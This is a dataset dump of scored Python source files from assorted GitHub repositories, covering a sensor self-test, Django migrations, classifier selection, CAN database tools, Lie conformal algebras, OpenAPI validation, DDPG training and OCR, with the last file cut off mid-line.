max_stars_repo_path
stringlengths
4
197
max_stars_repo_name
stringlengths
6
120
max_stars_count
int64
0
191k
id
stringlengths
1
8
content
stringlengths
6
964k
score
float64
-0.88
3.95
int_score
int64
0
4
examples/ex1_ezo_rtd.py
MartyTerra/EZO-RTD
0
12746155
<gh_stars>0 import machine import time import ezo_rtd print("MSG: Start of Atlas Scientific EZO-RTD self test") i2c = machine.I2C(scl=machine.Pin(22), sda=machine.Pin(23)) atlas = ezo_rtd.EZO_RTD_I2C(i2c) while True: print(atlas.celcius) print("MSG: End of Atlas Scientific EZO-RTD self test")
1.007813
1
orchestra/migrations/0037_add_fields_to_iteration.py
code-review-doctor/orchestra
444
12746283
<filename>orchestra/migrations/0037_add_fields_to_iteration.py<gh_stars>100-1000 # -*- coding: utf-8 -*- # Generated by Django 1.9.5 on 2016-04-14 21:18 from __future__ import unicode_literals import django.utils.timezone from django.db import migrations from django.db import models class Migration(migrations.Migration): dependencies = [ ('orchestra', '0036_remove_taskassignment_snapshots'), ] operations = [ migrations.AddField( model_name='iteration', name='created_at', field=models.DateTimeField(default=django.utils.timezone.now), ), migrations.AddField( model_name='iteration', name='is_deleted', field=models.BooleanField(default=False), ), ]
0.800781
1
deslib/dcs/base.py
qhduan/DESlib
0
12746411
<gh_stars>0 from abc import ABCMeta import numpy as np from deslib.base import DS from deslib.util.aggregation import majority_voting_rule, predict_proba_ensemble class DCS(DS): """Base class for a Dynamic Classifier Selection (dcs) method. All dynamic classifier selection classes should inherit from this class. Warning: This class should not be used directly, use derived classes instead. Parameters ---------- pool_classifiers : list of classifiers The generated_pool of classifiers trained for the corresponding classification problem. The classifiers should support methods "predict" and "predict_proba". k : int (Default = 7) Number of neighbors used to estimate the competence of the base classifiers. DFP : Boolean (Default = False) Determines if the dynamic frienemy pruning is applied. with_IH : Boolean (Default = False) Whether the hardness level of the region of competence is used to decide between using the DS algorithm or the KNN for classification of a given query sample. safe_k : int (default = None) The size of the indecision region. IH_rate : float (default = 0.3) Hardness threshold. If the hardness level of the competence region is lower than the IH_rate the KNN classifier is used. Otherwise, the DS algorithm is used for classification. selection_method : String (Default = "best") Determines which method is used to select the base classifier after the competences are estimated. diff_thresh : float (Default = 0.1) Threshold to measure the difference between the competence level of the base classifiers for the random and diff selection schemes. If the difference is lower than the threshold, their performance are considered equivalent. rng : numpy.random.RandomState instance Random number generator to assure reproducible results. References ---------- Woods, <NAME>. <NAME>, and <NAME>. "Combination of multiple classifiers using local accuracy estimates." IEEE transactions on pattern analysis and machine intelligence 19.4 (1997): 405-410. Britto, <NAME>., <NAME>, and <NAME>. "Dynamic selection of classifiers—a comprehensive review." Pattern Recognition 47.11 (2014): 3665-3680. <NAME> and <NAME>, Methods for Dynamic Classifier Selection 10th Int. Conference on Image Analysis and Proc., Venice, Italy (1999), 659-664. <NAME>, <NAME>, and <NAME>, “Dynamic classifier selection: Recent advances and perspectives,” Information Fusion, vol. 41, pp. 195 – 216, 2018. """ __metaclass__ = ABCMeta def __init__(self, pool_classifiers, k=7, DFP=False, safe_k=None, with_IH=False, IH_rate=0.30, selection_method='best', diff_thresh=0.1, rng=np.random.RandomState()): if not isinstance(selection_method, str): raise TypeError('The parameter selection_method should be a string.' ' selection_method = ', type(selection_method)) selection_method = selection_method.lower() if selection_method not in ['best', 'all', 'random', 'diff']: raise ValueError('Invalid value for parameter "selection_method." The possible values are: ' '"best", "all", "random", "diff"') if not isinstance(diff_thresh, float): raise TypeError('The parameter diff_thresh should be a float. diff_thresh = ', diff_thresh) if diff_thresh >= 0.5 or diff_thresh < 0.0 or np.isnan(diff_thresh): raise ValueError('diff_thresh should be lower than 0.5. diff_thresh = ', diff_thresh) super(DCS, self).__init__(pool_classifiers, k, DFP=DFP, with_IH=with_IH, safe_k=safe_k, IH_rate=IH_rate) self.selection_method = selection_method self.diff_thresh = diff_thresh self.rng = rng def estimate_competence(self, query, predictions=None): """estimate the competence of each base classifier for the classification of the query sample. Parameters ---------- query : array containing the test sample = [n_features] predictions : array of shape = [n_samples, n_classifiers] Contains the predictions of all base classifier for all samples in the query array Returns ------- competences : array of shape = [n_classifiers] The competence level estimated for each base classifier in the pool """ pass def select(self, competences): """Select the most competent classifier for the classification of the query sample given the competence level estimates. Four selection schemes are available. Best : The base classifier with the highest competence level is selected. In cases where more than one base classifier achieves the same competence level, the one with the lowest index is selected. This method is the standard for the LCA, OLA, MLA techniques. Diff : Select the base classifier that is significantly better than the others in the pool (when the difference between its competence level and the competence level of the other base classifiers is higher than a predefined threshold). If no base classifier is significantly better, the base classifier is selected randomly among the member with equivalent competence level. Random : Selects a random base classifier among all base classifiers that achieved the same competence level. ALL : all base classifiers with the max competence level estimates are selected (note that in this case the dcs technique becomes a des). Parameters ---------- competences : array = [n_classifiers] containing the estimated competence level for the base classifiers Returns ------- selected_clf : index of the selected base classifier(s) """ selected_clf = [] best_index = np.argmax(competences) if self.selection_method == 'best': # Select the classifier with highest competence level selected_clf = best_index elif self.selection_method == 'diff': """Selects a base classifier if its competence level is significant better than the rest. If there is no such classifier, select randomly a base model. the best classifier will always have diff < diff_thresh. In a case it is superior than all others, it will be the only member selected. Otherwise, a random classifier from this list is selected """ best_competence = np.max(competences) diff = best_competence - competences indices = [idx for idx, _ in enumerate(diff) if diff[idx] < self.diff_thresh] if len(indices) == 0: indices = range(self.n_classifiers) selected_clf = self.rng.choice(indices) elif self.selection_method == 'random': # Select a random classifier among all with same competence level indices = [idx for idx, competence in enumerate(competences) if competence == competences[best_index]] selected_clf = self.rng.choice(indices) elif self.selection_method == 'all': # select all base classifiers with max competence estimates. selected_clf = [idx for idx, competence in enumerate(competences) if competence == competences[best_index]] return selected_clf def classify_instance(self, query, predictions): """Predicts the class label of the corresponding query sample. If self.mode == "all", the majority voting scheme is used to aggregate the predictions of all classifiers with the max competence level estimate. Parameters ---------- query : array containing the test sample = [n_samples, n_features] predictions : array of shape = [n_samples, n_classifiers] Contains the predictions of all base classifier for all samples in the query array Returns ------- The predicted label of the query """ competences = self.estimate_competence(query, predictions=predictions) if self.selection_method != 'all': # only one classifier is selected clf_index = self.select(competences) predicted_label = predictions[clf_index] else: # Selected ensemble of classifiers is combined using Majority Voting indices = self.select(competences) votes = np.atleast_2d(predictions[indices]) predicted_label = majority_voting_rule(votes) return predicted_label def predict_proba_instance(self, query): """Predicts the posterior probabilities of the corresponding query sample. If self.mode == "all", get the probability estimates of the selected ensemble. Otherwise, the technique gets the probability estimates from the selected base classifier Parameters ---------- query : array containing the test sample = [n_features] Returns ------- predicted_proba : array = [n_classes] with the probability estimates for all classes """ competences = self.estimate_competence(query) if self.selection_method != 'all': # only one classifier is selected clf_index = self.select(competences) predicted_proba = self.pool_classifiers[clf_index].predict_proba(query) else: # Selected ensemble of classifiers is combined using Majority Voting indices = self.select(competences) classifier_ensemble = self._get_classifier_ensemble(indices) predicted_proba = predict_proba_ensemble(classifier_ensemble, query) return predicted_proba
2.265625
2
canmatrix/join.py
pierreluctg/canmatrix
0
12746539
import canmatrix.formats from canmatrix.canmatrix import CanId def list_pgn(db): """ :param db: :return: pgn and id """ id = [x.Id for x in db.frames] r = [CanId(t).tuples() for t in id] return [t[1] for t in r], id def ids_sharing_same_pgn(id_x, pgn_x, id_y, pgn_y): for idx, pgnx in zip(id_x, pgn_x): for idy, pgny in zip(id_y, pgn_y): if pgnx == pgny: yield (idx, idy) def join_frame_by_signal_startbit(files): targetDb = next(iter(canmatrix.formats.loadp(files.pop(0)).values())) pgn_x, id_x = list_pgn(db=targetDb) for f in files: sourceDb = next(iter(canmatrix.formats.loadp(f).values())) pgn_y, id_y = list_pgn(db=sourceDb) same_pgn = ids_sharing_same_pgn(id_x, pgn_x, id_y, pgn_y) for idx, idy in same_pgn: # print("{0:#x} {1:#x}".format(idx, idy)) targetFr = targetDb.frameById(idx) sourceFr = sourceDb.frameById(idy) to_add = [] for sig_t in targetFr.signals: for sig_s in sourceFr.signals: # print(sig.name) if sig_t.startbit == sig_s.startbit: # print("\t{0} {1}".format(sig_t.name, sig_s.name)) to_add.append(sig_s) for s in to_add: targetFr.addSignal(s) return targetDb def renameFrameWithID(sourceDb): for frameSc in sourceDb.frames: _, pgn, sa = CanId(frameSc.Id).tuples() exten = "__{pgn:#04X}_{sa:#02X}_{sa:03d}d".format(pgn=pgn, sa=sa) new_name = frameSc.name + exten # print(new_name) frameSc.name = new_name def renameFrameWithSAEacronyme(sourceDb, targetDb): pgn_x, id_x = list_pgn(db=targetDb) pgn_y, id_y = list_pgn(db=sourceDb) same_pgn = ids_sharing_same_pgn(id_x, pgn_x, id_y, pgn_y) for idx, idy in same_pgn: targetFr = targetDb.frameById(idx) sourceFr = sourceDb.frameById(idy) new_name = sourceFr.name + "__" + targetFr.name targetFr.name = new_name def join_frame_for_manufacturer(db, files): #targetDb = next(iter(im.importany(files.pop(0)).values())) pgn_x, id_x = list_pgn(db=db) for f in files: sourceDb = next(iter(canmatrix.formats.loadp(f).values())) pgn_y, id_y = list_pgn(db=sourceDb) same_pgn = ids_sharing_same_pgn(id_x, pgn_x, id_y, pgn_y) for idx, idy in same_pgn: # print("{0:#x} {1:#x}".format(idx, idy)) targetFr = db.frameById(idx) sourceFr = sourceDb.frameById(idy) _, pgn, sa = CanId(targetFr.Id).tuples() if(sa < 128): print('less', targetFr.name) to_add = [] for sig_s in sourceFr.signals: new_name = "{name}_{pgn:#04x}_{sa:03}".format( name=sig_s.name, pgn=pgn, sa=sa) sig_s.name = new_name to_add.append(sig_s) for s in to_add: targetFr.addSignal(s)
1.132813
1
nodeconductor/cost_tracking/migrations/0011_applicationtype_slug.py
p-p-m/nodeconductor
0
12746667
<reponame>p-p-m/nodeconductor<gh_stars>0 # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations from django.template.defaultfilters import slugify def init_application_types_slugs(apps, schema_editor): ApplicationType = apps.get_model("cost_tracking", "ApplicationType") for at in ApplicationType.objects.all(): at.slug = slugify(at.name) at.save() class Migration(migrations.Migration): dependencies = [ ('cost_tracking', '0010_applicationtype'), ] operations = [ migrations.AddField( model_name='applicationtype', name='slug', field=models.CharField(max_length=150, blank=True), preserve_default=True, ), migrations.RunPython(init_application_types_slugs), migrations.AlterField( model_name='applicationtype', name='slug', field=models.CharField(unique=True, max_length=150), preserve_default=True, ), ]
1.085938
1
cnn_src/eval_data_helpers.py
sefira/question-classification-cnn-rnn-attention
32
12746795
<filename>cnn_src/eval_data_helpers.py #! /usr/bin/env python import logging import os.path import sys import jieba import re logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s') logging.root.setLevel(level=logging.INFO) logger = logging.getLogger() def process_data(line): """ word break and remove word Returns split sentences """ # Word break seg_list = jieba.cut(line) line = u' '.join(seg_list) # Remove word ss = re.findall('[\n\s*\r\u4e00-\u9fa5]|nmovie|nrcelebrity', line) line = u"".join(ss).strip() if(len(line) < 2): return "UNK" return line def load_data(eval_data_file): eval_data = list(open(eval_data_file, "r").readlines()) row_data = [s.strip().split("\t") for s in eval_data] X = [process_data(item[0]) for item in row_data] Y = [int(item[1]) for item in row_data] return [len(X), X, Y] def batch_iter(data, batch_size, num_epochs, shuffle=True): """ Generates a batch iterator for a dataset. """ data = np.array(data) data_size = len(data) num_batches_per_epoch = int((len(data)-1)/batch_size) + 1 for epoch in range(num_epochs): # Shuffle the data at each epoch if shuffle: shuffle_indices = np.random.permutation(np.arange(data_size)) shuffled_data = data[shuffle_indices] else: shuffled_data = data for batch_num in range(num_batches_per_epoch): start_index = batch_num * batch_size end_index = min((batch_num + 1) * batch_size, data_size) yield shuffled_data[start_index:end_index]
1.984375
2
src/sage/algebras/lie_conformal_algebras/weyl_lie_conformal_algebra.py
UCD4IDS/sage
0
12746923
<reponame>UCD4IDS/sage<gh_stars>0 r""" Weyl Lie Conformal Algebra Given a commutative ring `R`, a free `R`-module `M` and a non-degenerate, skew-symmetric, bilinear pairing `\langle \cdot,\cdot\rangle: M \otimes_R M \rightarrow R`. The *Weyl* Lie conformal algebra associated to this datum is the free `R[T]`-module generated by `M` plus a central vector `K`. The non-vanishing `\lambda`-brackets are given by: .. MATH:: [v_\lambda w] = \langle v, w\rangle K. This is not an H-graded Lie conformal algebra. The choice of a Lagrangian decomposition `M = L \oplus L^*` determines an H-graded structure. For this H-graded Lie conformal algebra see the :mod:`Bosonic Ghosts Lie conformal algebra<sage.algebras.\ lie_conformal_algebras.bosonic_ghosts_lie_conformal_algebra>` AUTHORS: - <NAME> (2019-08-09): Initial implementation. """ #****************************************************************************** # Copyright (C) 2019 <NAME> <<EMAIL>> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # http://www.gnu.org/licenses/ #***************************************************************************** from .lie_conformal_algebra_with_structure_coefs import \ LieConformalAlgebraWithStructureCoefficients from sage.matrix.special import identity_matrix from sage.structure.indexed_generators import standardize_names_index_set class WeylLieConformalAlgebra(LieConformalAlgebraWithStructureCoefficients): r""" The Weyl Lie conformal algebra. INPUT: - ``R`` -- a commutative ring; the base ring of this Lie conformal algebra. - ``ngens``: an even positive Integer (default `2`); The number of non-central generators of this Lie conformal algebra. - ``gram_matrix``: a matrix (default: ``None``); A non-singular skew-symmetric square matrix with coefficients in `R`. - ``names`` -- a list or tuple of ``str``; alternative names for the generators - ``index_set`` -- an enumerated set; alternative indexing set for the generators OUTPUT: The Weyl Lie conformal algebra with generators `\alpha_i`, `i=1,...,ngens` and `\lambda`-brackets .. MATH:: [{\alpha_i}_{\lambda} \alpha_j] = M_{ij} K, where `M` is the ``gram_matrix`` above. .. NOTE:: The returned Lie conformal algebra is not `H`-graded. For a related `H`-graded Lie conformal algebra see :class:`BosonicGhostsLieConformalAlgebra<sage.algebras.\ lie_conformal_algebras.bosonic_ghosts_lie_conformal_algebra\ .BosonicGhostsLieConformalAlgebra>`. EXAMPLES:: sage: lie_conformal_algebras.Weyl(QQ) The Weyl Lie conformal algebra with generators (alpha0, alpha1, K) over Rational Field sage: R = lie_conformal_algebras.Weyl(QQbar, gram_matrix=Matrix(QQ,[[0,1],[-1,0]]), names = ('a','b')) sage: R.inject_variables() Defining a, b, K sage: a.bracket(b) {0: K} sage: b.bracket(a) {0: -K} sage: R = lie_conformal_algebras.Weyl(QQbar, ngens=4) sage: R.gram_matrix() [ 0 0| 1 0] [ 0 0| 0 1] [-----+-----] [-1 0| 0 0] [ 0 -1| 0 0] sage: R.inject_variables() Defining alpha0, alpha1, alpha2, alpha3, K sage: alpha0.bracket(alpha2) {0: K} sage: R = lie_conformal_algebras.Weyl(QQ); R.category() Category of finitely generated Lie conformal algebras with basis over Rational Field sage: R in LieConformalAlgebras(QQ).Graded() False sage: R.inject_variables() Defining alpha0, alpha1, K sage: alpha0.degree() Traceback (most recent call last): ... AttributeError: 'WeylLieConformalAlgebra_with_category.element_class' object has no attribute 'degree' TESTS:: sage: lie_conformal_algebras.Weyl(ZZ, gram_matrix=identity_matrix(ZZ,3)) Traceback (most recent call last): ... ValueError: The gram_matrix should be a non degenerate skew-symmetric 3 x 3 matrix, got [1 0 0] [0 1 0] [0 0 1] """ def __init__(self,R,ngens=None, gram_matrix=None, names=None, index_set=None): """ Initialize self. TESTS:: sage: V = lie_conformal_algebras.Weyl(QQ) sage: TestSuite(V).run() """ from sage.matrix.matrix_space import MatrixSpace if ngens: try: from sage.rings.integer_ring import ZZ assert ngens in ZZ and ngens % 2 == 0 except AssertionError: raise ValueError("ngens needs to be an even positive "+ "Integer, got {}".format(ngens)) if (gram_matrix is not None): if ngens is None: ngens = gram_matrix.dimensions()[0] try: assert (gram_matrix in MatrixSpace(R,ngens,ngens)) except AssertionError: raise ValueError("The gram_matrix should be a skew-symmetric "+ "{0} x {0} matrix, got {1}".format(ngens,gram_matrix)) if (not gram_matrix.is_skew_symmetric()) or \ (gram_matrix.is_singular()): raise ValueError("The gram_matrix should be a non degenerate " + "skew-symmetric {0} x {0} matrix, got {1}"\ .format(ngens,gram_matrix)) elif (gram_matrix is None): if ngens is None: ngens = 2 A = identity_matrix(R, ngens // 2) from sage.matrix.special import block_matrix gram_matrix = block_matrix([[R.zero(),A],[-A,R.zero()]]) latex_names = None if (names is None) and (index_set is None): names = 'alpha' latex_names = tuple(r'\alpha_{%d}' % i for i in range(ngens)) + ('K',) names,index_set = standardize_names_index_set(names=names, index_set=index_set, ngens=ngens) weyldict = { (i,j): {0: {('K',0): gram_matrix[index_set.rank(i), index_set.rank(j)]}} for i in index_set for j in index_set} super(WeylLieConformalAlgebra,self).__init__(R,weyldict,names=names, latex_names=latex_names, index_set=index_set, central_elements=('K',)) self._gram_matrix = gram_matrix def _repr_(self): """ The name of this Lie conformal algebra. EXAMPLES:: sage: R = lie_conformal_algebras.Weyl(ZZ); R The Weyl Lie conformal algebra with generators (alpha0, alpha1, K) over Integer Ring """ return "The Weyl Lie conformal algebra with generators {} over {}"\ .format(self.gens(),self.base_ring()) def gram_matrix(self): r""" The Gram matrix that specifies the `\lambda`-brackets of the generators. EXAMPLES:: sage: R = lie_conformal_algebras.Weyl(QQbar, ngens=4) sage: R.gram_matrix() [ 0 0| 1 0] [ 0 0| 0 1] [-----+-----] [-1 0| 0 0] [ 0 -1| 0 0] """ return self._gram_matrix
1.617188
2
packages/service-library/src/servicelib/rest_validators.py
KZzizzle/osparc-simcore
0
12747051
from aiohttp import web from openapi_core.validation.request.validators import RequestValidator from openapi_core.validation.response.validators import ResponseValidator from .openapi_wrappers import ( PATH_KEY, QUERY_KEY, AiohttpOpenAPIRequest, AiohttpOpenAPIResponse, ) from .rest_oas import OpenApiSpec, get_specs from .rest_responses import create_error_response class OpenApiValidator: """ Used to validate data in the request->response cycle against openapi specs """ @classmethod def create(cls, app: web.Application, _version=""): specs = get_specs(app) # TODO: one per version! return cls(specs) def __init__(self, spec: OpenApiSpec): self._reqvtor = RequestValidator(spec, custom_formatters=None) self._resvtor = ResponseValidator(spec, custom_formatters=None) # Current self.current_request = None # wrapper request async def check_request(self, request: web.Request): self.current_request = None rq = await AiohttpOpenAPIRequest.create(request) result = self._reqvtor.validate(rq) # keeps current request and reuses in response self.current_request = rq if result.errors: err = create_error_response( result.errors, "Failed request validation against API specs", web.HTTPBadRequest, ) raise err path, query = [result.parameters[k] for k in (PATH_KEY, QUERY_KEY)] return path, query, result.body def check_response(self, response: web.Response): req = self.current_request res = AiohttpOpenAPIResponse( response, response.text ) # FIXME:ONLY IN SERVER side. Async in client! result = self._resvtor.validate(req, res) if result.errors: err = create_error_response( result.errors, "Failed response validation against API specs", web.HTTPServiceUnavailable, ) raise err
1.695313
2
episode.py
RomDeffayet/DDPG_multi_agent
2
12747179
# -*- coding: utf-8 -*- """ Created on Wed Nov 14 14:28:11 2018 @author: <NAME> """ import numpy as np import numpy.random as rd import argparse from collections import deque import pickle import os from ddpg import Actor, Critic from make_env import make_env import torch dtype = torch.float device = torch.device("cuda") def ornsteinUhlenbeck(x_prev, mu, sigma = 0.3, theta = 0.15, dt = 0.01): mu = np.zeros_like(x_prev) n = np.size(x_prev) x = x_prev + theta*(mu - x_prev)*dt + sigma*np.sqrt(dt)*rd.normal(0, 1, n) return x def sample(buffer, N): if len(buffer) <= N: return buffer else: idx = rd.choice(len(buffer), N, replace = False) sample = [] for i in range(N): sample.append(buffer[idx[i]]) return sample def episode(n_episodes, buffer_size, N, learn, render, x0, mu, sigma, theta, dt, alpha, gamma, tau, init_actors = None, init_critics = None): actors, critics = [], [] for i in range(env.n): if init_actors is not None: actors = init_actors critics = init_critics else: actors.append(Actor(env.observation_space[i].shape[0], env.action_space[i].n)) critics.append(Critic(env.observation_space[i].shape[0], env.action_space[i].n, actors[i])) replay_buffer = deque() evolution = [] for ep in range(n_episodes): noise = x0 state = env.reset() ep_rewards = np.zeros(env.n) step_count = 0 done = np.array([False] * 4) while (not any(done) and step_count < 1000): if render: env.render() ###Choose an action and go to next state actions = [] for i in range(env.n): noise = ornsteinUhlenbeck(noise, mu, sigma, theta, dt) action = actors[i].forwardPass(state[i]).detach().numpy() actions.append(np.clip(action + noise, -2, 2)) next_state, rewards, done, _ = env.step(actions) rewards = np.asarray(rewards) - 500*np.asarray(done) ep_rewards += rewards if learn: ###Store in the replay buffer replay_buffer.append(np.array([state, actions, rewards, next_state])) if len(replay_buffer)>buffer_size: replay_buffer.popleft() ###Sample a minibatch from the buffer minibatch = sample(replay_buffer, N) ###Learn from this minibatch for i in range(env.n): critics[i].learn(minibatch, i) actors[i].learn(minibatch, i) ###Prepare for next step step_count +=1 state = next_state ep_rewards /= step_count print("Episode " + str(ep) + " : " + str(ep_rewards) + " in " + str(step_count) + " steps") evolution.append((ep_rewards, step_count)) return actors, critics, evolution if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--env', default='simple_tag_guided', type=str) parser.add_argument('--n_episodes', default=5000, type=int) parser.add_argument ('--learn', default=True, type=bool) parser.add_argument ('--render', default=False, type=bool) parser.add_argument ('--buffer_size', default=1000, type=int) parser.add_argument ('--minibatch_size', default=32, type=int) parser.add_argument ('--alpha', default=0.001, type=float) parser.add_argument ('--gamma', default=0.9, type=float) parser.add_argument ('--tau', default=0.01, type=float) parser.add_argument ('--ou_x0', default=0, type=float) parser.add_argument ('--ou_mu', default=0, type=float) parser.add_argument ('--ou_sigma', default=0.3, type=float) parser.add_argument ('--ou_theta', default=0.15, type=float) parser.add_argument ('--ou_dt', default=0.01, type=float) args = parser.parse_args() env = make_env(args.env) actors, critics, evolution = episode(n_episodes = args.n_episodes, buffer_size = args.buffer_size, N = args.minibatch_size, learn = args.learn, render = args.render, x0 = args.ou_x0 * np.ones(env.action_space[0].n), mu = args.ou_mu * np.ones(env.action_space[0].n), sigma = args.ou_sigma, theta = args.ou_theta, dt = args.ou_dt, alpha = args.alpha, gamma = args.gamma, tau = args.tau) pickle.dump(actors, open('actors','wb')) pickle.dump(critics, open('critics','wb')) pickle.dump(evolution, open('evolution','wb')) print(os.getcwd())
1.898438
2
main_online.py
RavenKiller/craft_moranv2
2
12747307
""" Copyright (c) 2019-present NAVER Corp. MIT License """ # -*- coding: utf-8 -*- import sys import os import time import argparse import torch import torch.nn as nn import torch.backends.cudnn as cudnn from torch.autograd import Variable from PIL import Image import cv2 from skimage import io import numpy as np import json import zipfile import tools.utils as utils import tools.dataset as dataset import tools.imgproc as imgproc import tools.craft_utils as craft_utils from models.craft import CRAFT from models.moran import MORAN import matplotlib.pyplot as plt from collections import OrderedDict def copyStateDict(state_dict): if list(state_dict.keys())[0].startswith("module"): start_idx = 1 else: start_idx = 0 new_state_dict = OrderedDict() for k, v in state_dict.items(): name = ".".join(k.split(".")[start_idx:]) new_state_dict[name] = v return new_state_dict def str2bool(v): return v.lower() in ("yes", "y", "true", "t", "1") def craft_net(net, image, text_threshold, link_threshold, low_text, cuda, poly, refine_net=None): t0 = time.time() # resize img_resized, target_ratio, size_heatmap = imgproc.resize_aspect_ratio(image, args.canvas_size, interpolation=cv2.INTER_LINEAR, mag_ratio=args.mag_ratio) ratio_h = ratio_w = 1 / target_ratio # preprocessing x = imgproc.normalizeMeanVariance(img_resized) x = torch.from_numpy(x).permute(2, 0, 1) # [h, w, c] to [c, h, w] x = Variable(x.unsqueeze(0)) # [c, h, w] to [b, c, h, w] if cuda: x = x.cuda() # forward pass with torch.no_grad(): y, feature = net(x) # make score and link map score_text = y[0,:,:,0].cpu().data.numpy() score_link = y[0,:,:,1].cpu().data.numpy() tmp1 = score_link.copy() tmp2 = score_text.copy() # Post-processing boxes, polys, rot_rects = craft_utils.getDetBoxes(score_text, score_link, text_threshold, link_threshold, low_text, False) # coordinate adjustment boxes = craft_utils.adjustResultCoordinates(boxes, ratio_w, ratio_h) rot_rects = craft_utils.adjustResultCoordinatesNew(rot_rects, ratio_w, ratio_h) # render results (optional) render_img = score_text.copy() render_img = np.hstack((render_img, score_link)) ret_score_text = imgproc.cvt2HeatmapImg(render_img) if args.show_time : print("\ninfer/postproc time : {:.3f}/{:.3f}".format(t0, t1)) return boxes, ret_score_text,rot_rects parser = argparse.ArgumentParser(description='CRAFT Text Detection') # CRAFT args parser.add_argument('--craft_trained_model', default='pretrained/craft_mlt_25k.pth', type=str, help='pretrained model') parser.add_argument('--img_path', default='test/1.jpg', type=str, help='folder path to input images') parser.add_argument('--text_threshold', default=0.7, type=float, help='text confidence threshold') parser.add_argument('--low_text', default=0.4, type=float, help='text low-bound score') parser.add_argument('--link_threshold', default=0.4, type=float, help='link confidence threshold') parser.add_argument('--cuda', default=True, type=str2bool, help='Use cuda for inference') parser.add_argument('--canvas_size', default=1280, type=int, help='image size for inference') parser.add_argument('--mag_ratio', default=1.5, type=float, help='image magnification ratio') parser.add_argument('--poly', default=False, action='store_true', help='enable polygon type') parser.add_argument('--show_time', default=False, action='store_true', help='show processing time') parser.add_argument('--refine', default=False, action='store_true', help='enable link refiner') parser.add_argument('--refiner_model', default='pretrained/craft_refiner_CTW1500.pth', type=str, help='pretrained refiner model') # moran parser.add_argument('--moran_path', default='pretrained/moran.pth', type=str, help='pretrained moran model') args = parser.parse_args() moran_path = args.moran_path alphabet = '0:1:2:3:4:5:6:7:8:9:a:b:c:d:e:f:g:h:i:j:k:l:m:n:o:p:q:r:s:t:u:v:w:x:y:z:$' if __name__ == '__main__': ################################################ # cv2 initialize ################################################ cap = cv2.VideoCapture(0) ################################################ # CRAFT loading part ################################################ # load net net = CRAFT() # initialize if args.cuda: net.load_state_dict(copyStateDict(torch.load(args.craft_trained_model))) else: net.load_state_dict(copyStateDict(torch.load(args.craft_trained_model, map_location='cpu'))) if args.cuda: net = net.cuda() net = torch.nn.DataParallel(net) cudnn.benchmark = False net.eval() ################################################ # MORAN loading part ################################################ cuda_flag = False if torch.cuda.is_available(): cuda_flag = True MORAN = MORAN(1, len(alphabet.split(':')), 256, 32, 100, BidirDecoder=True, CUDA=cuda_flag) MORAN = MORAN.cuda() else: MORAN = MORAN(1, len(alphabet.split(':')), 256, 32, 100, BidirDecoder=True, inputDataType='torch.FloatTensor', CUDA=cuda_flag) print('loading pretrained model from %s' % moran_path) if cuda_flag: state_dict = torch.load(moran_path) else: state_dict = torch.load(moran_path, map_location='cpu') MORAN_state_dict_rename = OrderedDict() for k, v in state_dict.items(): name = k.replace("module.", "") # remove `module.` MORAN_state_dict_rename[name] = v MORAN.load_state_dict(MORAN_state_dict_rename) for p in MORAN.parameters(): p.requires_grad = False MORAN.eval() while(cap.isOpened()): all_text = [] all_text_reverse = [] ################################################ # CRAFT processing part ################################################ # load data tik = time.time() ret, image = cap.read() # image = cv2.imread('test/1.jpg') image_raw = image.copy() bboxes, score_text,rot_rects = craft_net(net, image, args.text_threshold, args.link_threshold, args.low_text, args.cuda, args.poly) print("time1: ",time.time()-tik) # save text rectangles filename, file_ext = os.path.splitext(os.path.basename(args.img_path)) # 这个可以保存切分的图片 img_cuts = utils.saveSplitTextRects(image,rot_rects,save_file=False,save_prefix="rect_"+filename) print("time2: ",time.time()-tik) if not img_cuts: cv2.imshow('Capture', image) if cv2.waitKey(1) & 0xFF == ord('q'): break continue ############################################### # MORAN processing part ################################################ converter = utils.strLabelConverterForAttention(alphabet, ':') transformer = dataset.resizeNormalize((100, 32)) images = [transformer(Image.fromarray(img.astype('uint8')).convert('L')) for img in img_cuts] images = [Variable(img.view(1, *img.size())) for img in images] all_image = torch.cat(images,axis=0) if cuda_flag: all_image = all_image.cuda() text = torch.LongTensor(1 * 5) length = torch.IntTensor(1) text = Variable(text) length = Variable(length) # 从单张修改为多张,只需要改Length # 作者给的处理工具已经考虑了多个图片同时处理的情况 max_iter = 20 t, l = converter.encode('0'*max_iter) utils.loadData(text, t) utils.loadData(length, l) length = torch.ones(len(img_cuts))*20 length = length.int() output = MORAN(all_image, length, text, text, test=True, debug=False) preds, preds_reverse = output[0] _, preds = preds.max(1) _, preds_reverse = preds_reverse.max(1) sim_preds = converter.decode(preds.data, length.data) all_text = [v.strip().split('$')[0] for v in sim_preds] print(sim_preds) print("time3: ",time.time()-tik) result_img = utils.saveResult(args.img_path, image_raw[:,:,::-1], bboxes,save_file=False, texts=all_text) print("time4: ",time.time()-tik) print(all_text) cv2.imshow('Capture', result_img) if cv2.waitKey(1) & 0xFF == ord('q'): break
2.21875
2
src/imitation_frames.py
akolishchak/doom-net-pytorch
143
12747435
# # imitation_frames.py, doom-net # # Created by <NAME> on 01/21/17. # import os import time import h5py import torch import torch.nn as nn import torch.optim as optim from device import device import argparse from doom_instance import * from aac import BaseModel def data_generator(args, screens, variables, labels, episodes, step_size): # remove short episodes episode_min_size = args.episode_size*step_size episodes = episodes[episodes[:, 1]-episodes[:, 0] > episode_min_size] episodes_num = len(episodes) # step_idx = episodes[:, 0].copy() + np.random.randint(step_size, size=episodes_num) step_screens = np.ndarray(shape=(args.batch_size, *screens.shape[1:]), dtype=np.float32) step_variables = np.ndarray(shape=(args.batch_size, *variables.shape[1:]), dtype=np.float32) step_labels = np.ndarray(shape=(args.batch_size,), dtype=np.int) step_terminals = np.ones(shape=(args.batch_size,), dtype=np.float32) # select episodes for the initial batch batch_episodes = np.random.randint(episodes_num, size=args.batch_size) while True: for i in range(args.batch_size): idx = batch_episodes[i] step_screens[i, :] = screens[step_idx[idx]] / 127.5 - 1.0 step_variables[i, :] = variables[step_idx[idx]] / 100 step_labels[i] = labels[step_idx[idx]] step_idx[idx] += step_size if step_idx[idx] > episodes[idx][1]: step_idx[idx] = episodes[idx][0] + np.random.randint(step_size) step_terminals[i] = 0 # reached terminal state, select a new episode batch_episodes[i] = np.random.randint(episodes_num) else: step_terminals[i] = 1 yield torch.from_numpy(step_screens), \ torch.from_numpy(step_variables), \ torch.from_numpy(step_labels), \ 